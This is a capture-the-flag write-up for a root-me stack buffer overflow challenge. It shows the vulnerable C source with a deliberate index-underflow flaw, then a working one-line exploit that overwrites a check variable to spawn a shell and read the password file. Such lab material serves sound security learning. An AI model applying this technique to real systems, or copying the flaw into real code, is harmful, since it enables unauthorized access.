ELF x86: Stack buffer overflow basic 3
root-me challenge: An intermediate level to familiarize yourself with stack overflows.
Environment configuration:
PIE Position Independent Executable No
RelRO Read Only relocations Yes
NX Non-Executable Stack Yes
ASLR Address Space Layout Randomization No
SF Source Fortification No
SSP Stack-Smashing Protection No
SRC Source code access Yes
Source code:
#include <stdio.h>
#include <sys/time.h>
#include <sys/types.h>
#include <unistd.h>
#include <stdlib.h>
void shell(void);
int main()
{
char buffer[64];
int check;
int i = 0;
int count = 0;
printf("Enter your name: ");
fflush(stdout);
while(1)
{
if(count >= 64)
printf("Oh no...Sorry !\n");
if(check == 0xbffffabc)
shell();
else
{
read(fileno(stdin),&i,1);
switch(i)
{
case '\n':
printf("\a");
break;
case 0x08:
count--;
printf("\b");
break;
case 0x04:
printf("\t");
count++;
break;
case 0x90:
printf("\a");
count++;
break;
default:
buffer[count] = i;
count++;
break;
}
}
}
}
void shell(void)
{
setreuid(geteuid(), geteuid());
system("/bin/bash");
}
4*\x08 is going to decrease the value of count by 4 to get the check variable, which needs to be 0xbffffabc (mind endian):
app-systeme-ch16@challenge02:~$ cat <(python -c "print '\x08'*4 + '\xbc\xfa\xff\xbf'") - | ./ch16
cat .passwd